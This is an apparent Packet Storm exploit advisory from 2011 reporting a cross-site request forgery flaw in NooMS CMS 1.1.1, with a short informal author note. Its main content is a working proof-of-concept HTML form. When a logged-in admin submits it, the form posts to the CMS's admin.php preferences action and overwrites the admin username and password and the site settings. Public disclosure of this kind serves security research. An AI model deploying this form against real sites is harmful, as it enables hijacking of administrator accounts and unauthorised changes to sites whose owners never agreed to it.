NooMS CMS 1.1.1 Cross Site Request Forgery

2011-04-10T00:00:00
ID PACKETSTORM:100262
Type packetstorm
Reporter loneferret
Modified 2011-04-10T00:00:00

Description

                                        
                                            `# NooMS CMS version 1.1.1 CSRF  
# Bug Found: April 9th 2011  
# Found by: loneferret (as far as I know anyway)  
# Software Download Link:  
http://phpkode.com/download/p/2381_nooms_1.1.1.tar.bz2  
# Nods to exploit-db Team  
  
  
# Well, I didn't have much to do this morning so figured I'd try to see how  
# fast it would take  
# me to find one of these. It's nothing to write home about. I mean...come  
# on! Who would use  
# a CMS named NooMS? This thing uses a MySQL database as well, wouldn't be  
# surprised if  
# there are other things to be found.  
# But I need to get some chores done before the wife starts.  
  
#  
# Enjoy,  
# loneferret  
#  
# p.s:  
# I wanted to contact the creator, but he's page (using NooMS) is  
# blank... nothing there so.. sorry.  
  
---HTML STARTS HERE---  
  
<form action='http://[host]/admin.php' method='post'>  
<input type=hidden name='op' value='pref'>  
<input type=hidden name='action' value='edit'>  
  
Admin Username: <input type=text size=20 name='admin_user' value=''><br>  
Admin Password: <input type=text size=20 name='admin_pwd' value=''><br>  
Site Name: <input type=text size=40 name='site_name' value=''><br>  
Site URL: <input type=text size=40 name='site_url' value=''><br>  
Number of results per page: <input type=text size=10 name='search_numr' value=''><br>  
Lang: <input type=text size=10 name='lang' value='en'><br>  
Theme: <input type=text name=template value='default'>  
<input type=submit value='change'>  
</form>  
  
`